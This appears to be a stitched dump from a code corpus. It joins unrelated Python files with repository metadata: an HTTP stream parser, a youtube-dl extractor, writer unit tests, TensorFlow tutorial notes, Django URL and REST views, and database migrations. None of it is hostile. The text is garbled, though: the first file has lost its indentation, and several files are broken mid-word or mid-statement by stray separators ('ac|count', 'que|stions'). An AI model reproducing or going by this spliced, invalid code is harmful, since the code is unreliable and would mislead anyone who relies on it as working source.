self.__TRAILER = 4
self.__CHUNK_LEN = 5
self.__CHUNK_BODY = 6
self.__CHUNK_END = 7
self._sfhttp = sfhttp
self._is_client = is_client
if is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
self._data = []
self.result = []
self._ip = ''
self._port = ''
self._peer_ip = ''
self._peer_port = ''
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
self.__is_error = False
def in_data(self, data, header):
if self.__is_error:
return
if self._ip == '' or self._port == '':
if header['from'] == '1':
self._ip = header['ip1']
self._port = header['port1']
self._peer_ip = header['ip2']
self._peer_port = header['port2']
elif header['from'] == '2':
self._ip = header['ip2']
self._port = header['port2']
self._peer_ip = header['ip1']
self._peer_port = header['port1']
self._data.append(data)
try:
self._parse(header)
except Exception:
self.__is_error = True
print('parse error:', file=sys.stderr)
exc_type, exc_value, exc_traceback = sys.exc_info()
print("*** extract_tb:", file=sys.stderr)
print(repr(traceback.extract_tb(exc_traceback)), file=sys.stderr)
print("*** format_tb:", file=sys.stderr)
print(repr(traceback.format_tb(exc_traceback)), file=sys.stderr)
print("*** tb_lineno:", exc_traceback.tb_lineno, file=sys.stderr)
def _push_data(self):
result = {}
if self._is_client:
if self._method == {}:
self.__is_error = True
return
result['method'] = self._method
else:
if self._response == {}:
self.__is_error = True
return
result['response'] = self._response
result['header'] = self._header
result['trailer'] = self._trailer
result['ip'] = self._ip
result['port'] = self._port
self.result.append(result)
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
def _parse(self, header):
while True:
if self._state == self.__METHOD:
if not self._parse_method():
break
elif self._state == self.__RESP:
if not self._parse_response():
break
elif self._state == self.__HEADER:
if not self._parse_header(header):
break
elif self._state == self.__BODY:
self._skip_body()
if self._remain > 0:
break
elif self._state == self.__CHUNK_LEN:
if not self._parse_chunk_len():
break
elif self._state == self.__CHUNK_BODY:
self._skip_body()
if self._remain > 0:
break
self._state = self.__CHUNK_LEN
elif self._state == self.__CHUNK_END:
self._skip_body()
if self._remain > 0:
break
self._state = self.__TRAILER
else:
break
def _parse_chunk_len(self):
(result, line) = self._read_line()
if result:
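            # Chunk header is a hex size, optionally followed by ';extensions';
            # the +2 below accounts for the CRLF terminating the chunk body.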
self._remain = int(line.split(b';')[0], 16) + 2
self._state = self.__CHUNK_BODY
if self._remain == 2:
                self._state = self.__CHUNK_END
return True
else:
return False
def _parse_trailer(self):
(result, line) = self._read_line()
if result:
if len(line) == 0:
if self._is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
self._trailer[sp[0].decode('utf-8')] = val
return True
else:
return False
def _parse_method(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._method['method'] = sp[0].decode('utf-8')
self._method['uri'] = sp[1].decode('utf-8')
self._method['ver'] = sp[2].decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_response(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._response['ver'] = sp[0].decode('utf-8')
self._response['code'] = sp[1].decode('utf-8')
self._response['msg'] = (b' '.join(sp[2:])).decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_header(self, sftap_header):
(result, line) = self._read_line()
if result:
if line == b'':
if 'content-length' in self._header:
self._remain = int(self._header['content-length'])
if self._remain > 0:
self._state = self.__BODY
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
ctype = sp[0].decode('utf-8').lower()
if ctype == 'content-type' and val.split('/')[0] == 'video':
self._sfhttp.input_video(val, sftap_header,
self._ip, self._port,
self._peer_ip, self._peer_port)
self._header[sp[0].decode('utf-8').lower()] = val
return True
else:
return False
def _skip_body(self):
while len(self._data) > 0:
num = sum([len(x) for x in self._data[0]])
if num <= self._remain:
self._data.pop(0)
self._remain -= num
if self._remain == 0:
if self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
while True:
num = len(self._data[0][
|
valmynd/MediaFetcher
|
src/plugins/youtube_dl/youtube_dl/extractor/drbonanza.py
|
Python
|
gpl-3.0
| 1,678
| 0.026222
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
js_to_json,
parse_duration,
unescapeHTML,
)
class DRBonanzaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/bonanza/[^/]+/\d+/[^/]+/(?P<id>\d+)/(?P<display_id>[^/?#&]+)'
_TEST = {
'url': 'http://www.dr.dk/bonanza/serie/154/matador/40312/matador---0824-komme-fremmede-',
'info_dict': {
'id': '40312',
'display_id': 'matador---0824-komme-fremmede-',
'ext': 'mp4',
            'title': 'MATADOR - 08:24. "Komme fremmede".',
'description': 'md5:77b4c1ac4d4c1b9d610ab4395212ff84',
'thumbnail': r're:^https?://.*\.(?:gif|jpg)$',
'duration': 4613,
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id, display_id = mobj.group('id', 'display_id')
webpage = self._download_webpage(url, display_id)
        info = self._parse_html5_media_entries(
url, webpage, display_id, m3u8_id='hls',
m3u8_entry_protocol='m3u8_native')[0]
self._sort_formats(info['formats'])
asset = self._parse_json(
self._search_regex(
r'(?s)currentAsset\s*=\s*({.+?})\s*</script', webpage, 'asset'),
display_id, transform_source=js_to_json)
title = unescapeHTML(asset['AssetTitle']).strip()
def extract(field):
return self._search_regex(
r'<div[^>]+>\s*<p>%s:<p>\s*</div>\s*<div[^>]+>\s*<p>([^<]+)</p>' % field,
webpage, field, default=None)
info.update({
'id': asset.get('AssetId') or video_id,
'display_id': display_id,
'title': title,
'description': extract('Programinfo'),
'duration': parse_duration(extract('Tid')),
'thumbnail': asset.get('AssetImageUrl'),
})
return info
|
free-electrons/custom_tests_tool
|
tests/test_writers.py
|
Python
|
gpl-2.0
| 4,332
| 0.000462
|
from nose.tools import assert_equal, assert_raises
import mock
import xmlrpc.client
from src.writers import FileWriter, LavaWriter
from src.writers import UnavailableError
class TestFileWriter(object):
OUTPUT_DIR = 'foo'
CONTENT = 'test'
NAME = 'test-job-name'
def test_fail_open(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open()
with mock.patch('builtins.open', mo, create=True) as mocked:
mocked.side_effect = IOError
writer = FileWriter(cfg)
assert_raises(UnavailableError, writer.write, dict(),
self.NAME, self.CONTENT)
def test_write(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open(read_data=self.CONTENT)
        with mock.patch('builtins.open', mo, create=True) as mocked:
path = '%s/%s.yaml' % (self.OUTPUT_DIR, self.NAME)
mocked_file = mocked.return_value
writer = FileWriter(cfg)
results = writer.write(dict(), self.NAME, self.CONTENT)
mocked.assert_called_once_with(path, 'w')
            mocked_file.write.assert_called_with(self.CONTENT)
assert_equal(results, [path])
class TestLavaWriter(object):
DEVICE_TYPE = 'foo_bar'
CONTENT = 'test'
NAME = 'test-job-name'
UI_ADDRESS = 'http://webui.example.org'
@mock.patch('xmlrpc.client.ServerProxy')
def test_connection_error(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock.side_effect = xmlrpc.client.Error
assert_raises(UnavailableError, LavaWriter, cfg)
@mock.patch('xmlrpc.client.ServerProxy')
def test_device_offline(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.get_device_status.return_value = response
writer = LavaWriter(cfg)
assert_raises(UnavailableError, writer.write, board,
self.NAME, self.CONTENT)
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_unique(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = 42
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42)])
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_multiple(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = (42, 84)
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42),
'%s/scheduler/job/%d' % (self.UI_ADDRESS, 84)])
|
ghost9023/DeepLearningPythonStudy
|
DeepLearning/DeepLearning/02_Deep_ChoTH/tensorflow_prac.py
|
Python
|
mit
| 18,788
| 0.011447
|
##### Tensor deep learning, chapter 1
import tensorflow as tf
hello = tf.constant('Hello, Tensorflow')
sess = tf.Session()
print(sess.run(hello))
# The 'b' prefix means bytes literals.
node1 = tf.constant(3.0, tf.float32) # value, dtype
node2 = tf.constant(4.0) # value, dtype
node3 = tf.add(node1, node2) # value, dtype
# node3 = node1 + node2 # this form also works
print(node1)
print(node2)
print(node3)
sess = tf.Session()
print('sess.run(node1, node2):', sess.run([node1, node2]))
print('sess.run(node3):', sess.run(node3))
# Use a placeholder when the graph is built ahead of time and values should be fed in at execution time
# placeholder
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
print(sess.run(adder_node, feed_dict={a:3, b:4.5}))
print(sess.run(adder_node, feed_dict={a:[1,3], b:[2,4]}))
# A tensor is an array.
# Rank of an array:
# 0:scalar // 1:vector // 2:matrix // n:n-tensor.....
# Shape of a tensor:
# the shape you get from .shape()
# type
# int32 // float32
# Summary:
# design and build the graph!
# run the graph (sess.run, feed in values)
# return the results
#### Tensor deep learning, chapter 4 - reading data from a file
import numpy as np
import tensorflow as tf
xy = np.loadtxt('C:\python\DeepLearningPythonStudy\DeepLearning\DeepLearning\\02_Deep_ChoTH\data\data-01-test-score.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, x_data, len(x_data))
print(y_data.shape, y_data)
# Reference
# b = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
# b[:, 1] # column 1 of every row
# b[-1] # the last row
# b[-1, :] # the whole last row
# b[0:2, :] # all columns of the first two rows
# How many dimensions does the array have? -> rank
# What shape does the array have? -> shape
# axis
sess = tf.InteractiveSession()
t = tf.constant([1,2,3,4])
tf.shape(t).eval()
t = tf.constant([[1,2],
[3,4]])
tf.shape(t).eval()
t = tf.constant([[[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]])
tf.shape(t).eval()
m1 = tf.constant([[1.,2.]])
m2 = tf.constant(3.)
tf.shape(m1+m2).eval()
tf.reduce_mean([1.,2.], axis=0).eval() # values must be float, not integer!
x = [[1.,2.],
[3.,4.]]
tf.reduce_mean(x).eval()
tf.reduce_mean(x, axis=1).eval()
tf.reduce_mean(x, axis=0).eval() # axis 0 is the outermost axis
tf.reduce_mean(x, axis=-1).eval() # axis -1 is the innermost axis
tf.reduce_sum(x).eval()
tf.reduce_sum(x, 1).eval()
tf.reduce_sum(x, 0).eval()
tf.reduce_sum(x, -1).eval() # innermost axis
x = [[0,1,2],
[2,1,0]]
tf.argmax(x).eval() # returns the index of the largest value; the axis defaults to 0 when omitted
tf.argmax(x, 1).eval()
tf.argmax(x, 0).eval()
tf.argmax(x, -1).eval()
t = np.array([[[0, 1, 2],
[3, 4, 5]],
[[6, 7, 8],
[9, 10, 11]]])
t.shape
tf.reshape(t, shape=[-1,3]).eval() # innermost dim 3, infer the rest (-1): a 2-D result
tf.reshape(t, shape=[-1,1,3]).eval() # innermost dims 1 and 3, infer the rest (-1): a 3-D result
tf.squeeze([[0], [1], [2]]).eval() # remove size-1 dimensions
tf.expand_dims([0,1,2], 1).eval() # add a dimension
# one hot
tf.one_hot([[0], [1], [2], [0]], depth=3).eval() # one_hot adds a rank automatically
t = tf.one_hot([[0], [1], [2], [0]], depth=3) # reshape below to undo the automatically added rank
tf.reshape(t, shape=[-1, 3]).eval()
tf.cast([1.8, 2.2, 3.3, 4.9], tf.int32).eval()
tf.cast([True, False, 1 == 1, 0 == 1], tf.int32).eval()
x = [1, 4]
y = [2, 5]
z = [3, 6]
# Pack along first dim.
tf.stack([x, y, z]).eval()
tf.stack([x, y, z], axis=0).eval()
tf.stack([x, y, z], axis=1).eval()
x = [[0, 1, 2],
[2, 1, 0]]
tf.ones_like(x).eval()
tf.zeros_like(x).eval()
for x, y in zip([1,2,3], [4,5,6]):
print(x, y)
for x, y, z in zip([1,2,3], [4,5,6], [7,8,9]):
print(x, y, z)
# K = tf.sigmoid(tf.matmul(X, W1) + b1)
# hypothesis = tf.sigmoid(tf.matmul(K, W2) + b2)
# ML lab 09-1: Neural Net for XOR
# XOR neural network code
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W = tf.Variable(tf.random_normal([2,1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# softmax is omitted because the dataset is tiny
hypothesis = tf.sigmoid(tf.matmul(X,W) + b)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # compute the loss
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # shrink the loss via gradient descent
# Accuracy computation
# True if hypothesis > 0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
sess = tf.Session()
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h, "\nCorrect:", c, "\nAccuracy:", a)
# No errors, but the loss does not decrease: a single layer is far too simple!
# accuracy : [0.50208956]
# A two-layer network similar to the one above
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W1 = tf.Variable(tf.random_normal([2,2]), name='weight1') # first 2 is the input dimension, second 2 is the number of nodes (outputs)
b1 = tf.Variable(tf.random_normal([2]), name='bias1') # the bias must match the number of outputs
layer1 = tf.sigmoid(tf.matmul(X,W1) + b1)
# layer1 = tf.nn.relu(tf.matmul(X,W1) + b1)
W2 = tf.Variable(tf.random_normal([2,1]), name='weight2')
b2 = tf.Variable(tf.random_normal([1]), name='bias2')
hypothesis = tf.sigmoid(tf.matmul(layer1,W2) + b2)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # compute the loss
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # shrink the loss via gradient descent
# Accuracy computation
# True if hypothesis > 0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
sess = tf.Session()
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
    sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h,
|
"\nCorrect:", c, "\nAccuracy:", a)
# Accuracy: 0.75
# More layers do not automatically mean higher accuracy.
# During backpropagation the sigmoid keeps multiplying in values smaller than 1,
# so the propagated signal gets smaller and smaller.
# The further back (the closer to the input) a layer is, the smaller its influence: the gradient vanishes (vanishing gradient).
# That is why ReLU is used everywhere except the last layer, which keeps sigmoid because its output must lie between 0 and 1.
# Notes on weight initialization:
# 1. Never initialize to 0.
# 2. RBM pre-training is difficult, so use Xavier or He initialization instead.
# W = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in)      # Xavier
# W = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in / 2)  # He
# Use xavier, relu, dropout and adam everywhere except the CNN parts
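# Quick sanity check of the two initializers above (illustrative sketch using
# NumPy only; the variable names here are hypothetical):
_fan_in, _fan_out = 784, 256
_w_xavier = np.random.randn(_fan_in, _fan_out) / np.sqrt(_fan_in)
_w_he = np.random.randn(_fan_in, _fan_out) / np.sqrt(_fan_in / 2)
print(_w_xavier.std(), _w_he.std())  # roughly 1/sqrt(fan_in) and sqrt(2/fan_in)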
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
nb_classes = 10
keep_prob = tf.placeholder(tf.float32)
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, nb_classes])
###################################################
W1 = tf.get_variable("W1", shape=[784, 256], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.random_normal([256]))
layer1 = tf.nn.relu(tf.matmul(X, W1) + b1)
layer1 = tf.nn.dropout(layer1, keep_prob=keep_prob)
W2 = tf.get_variable("W2", shape=[256, 128], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.random_normal([128]))
layer2 = tf.nn.relu(tf.matmul(layer1, W2) + b2)
layer2 = tf.nn.dropout(layer2, keep_prob=keep_prob)
W3 = tf.get_variable("W3", shape=[128, nb_classes], initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.Variable(tf.random_normal([nb_classes]))
hypothesis = tf.matmul(layer2, W3) + b3
###################################################
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
# Test model
is_correct = tf.equal(tf.arg_max(hypothesis, 1),
|
blancltd/glitter-news
|
glitter_news/urls.py
|
Python
|
bsd-2-clause
| 849
| 0.002356
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import url
from . import feeds, views
urlpatterns = [
url(r'^$', views.PostListView.as_view(), name='list'),
url(
r'^category/(?P<slug>[-\w]+)/$',
views.PostListCategoryView.as_view(),
name='post-list-category'
),
url(
        r'^(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[-\w]+)/$',
views.PostDetailView.as_view(),
name='post-detail'
),
url(r'^feed/$', feeds.NewsFeed(), name='feed'),
url(r'^feed/(?P<slug>[-\w]+)/$', feeds.NewsCategoryFeed(), name='category-feed'),
]
if getattr(settings, 'GLITTER_NEWS_TAGS', False):
urlpatterns += [
url(r'^tag/(?P<slug>[-\w]+)/$', views.PostListTagView.as_view(), name='post-list-tag'),
]
|
djaodjin/djaodjin-survey
|
survey/api/campaigns.py
|
Python
|
bsd-2-clause
| 3,013
| 0.000332
|
# Copyright (c) 2020, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
from rest_framework import generics
from ..mixins import CampaignMixin
from .serializers import CampaignSerializer
LOGGER = logging.getLogger(__name__)
class CampaignAPIView(CampaignMixin, generics.RetrieveDestroyAPIView):
"""
Retrieves a campaign
Retrieves the details of a ``Campaign``.
**Tags**: survey
**Examples**
.. code-block:: http
GET /api/cowork/campaign/best-practices/ HTTP/1.1
responds
.. code-block:: json
{
"slug": "best-practices",
"ac
|
count": "envconnect",
"title": "Assessment on Best Practices",
"active": true,
"quizz_mode": false,
"que
|
stions": [
{
"path": "/product-design",
"title": "Product Design",
"unit": "assessment-choices",
},
{
"path": "/packaging-design",
"title": "Packaging Design",
"unit": "assessment-choices",
}
]
}
"""
serializer_class = CampaignSerializer
def get_object(self):
return self.campaign
def delete(self, request, *args, **kwargs):
"""
Deletes a campaign
Removes a ``Campaign`` and all associated ``Sample``
from the database.
**Tags**: survey
**Examples**
.. code-block:: http
DELETE /api/cowork/campaign/best-practices/ HTTP/1.1
"""
#pylint:disable=useless-super-delegation
return super(CampaignAPIView, self).delete(request, *args, **kwargs)
|
MartinPaulo/resplat
|
storage/migrations/0015_auto_20170914_0154.py
|
Python
|
lgpl-3.0
| 1,300
| 0.000769
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-14 01:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import storage.models.labels
class Migration(migrations.Migration):
dependencies = [
('storage', '0014_auto_20170914_0146'),
]
operations = [
        migrations.RemoveField(
model_name='accesslayer',
name='active_flag',
),
migrations.RemoveField(
model_name='accesslayer',
name='created_by',
),
migrations.RemoveField(
model_name='accesslayer',
name='creation_date',
),
migrations.RemoveField(
model_name='accesslayer',
name='last_modified',
),
migrations.RemoveField(
model_name='accesslayer',
name='updated_by',
),
migrations.AlterField(
model_name='accesslayer',
name='source',
field=models.ForeignKey(blank=True, default=storage.models.labels.GroupDefaultLabel('Access Layer Source'), help_text='the access layer source', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='access_layer', to='storage.Label'),
),
]
|
alvcarmona/efficiencycalculatorweb
|
effcalculator/effcalculator/urls.py
|
Python
|
gpl-3.0
| 915
| 0.001093
|
"""effcalculator URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
url(r'^', include('frontend.urls'))
]
|
zenefits/sentry
|
src/sentry/south_migrations/0104_auto__add_groupseen__add_unique_groupseen_group_user.py
|
Python
|
bsd-3-clause
| 28,081
| 0.008048
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupSeen'
db.create_table(u'sentry_groupseen', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'])),
('group', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Group'])),
('user', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.User'], db_index=False)),
('last_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal(u'sentry', ['GroupSeen'])
# Adding unique constraint on 'GroupSeen', fields ['group', 'user']
db.create_unique(u'sentry_groupseen', ['user_id', 'group_id'])
def backwards(self, orm):
# Removing unique constraint on 'GroupSeen', fields ['group', 'user']
db.delete_unique(u'sentry_groupseen', ['user_id', 'group_id'])
# Deleting model 'GroupSeen'
db.delete_table(u'sentry_groupseen')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
u'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
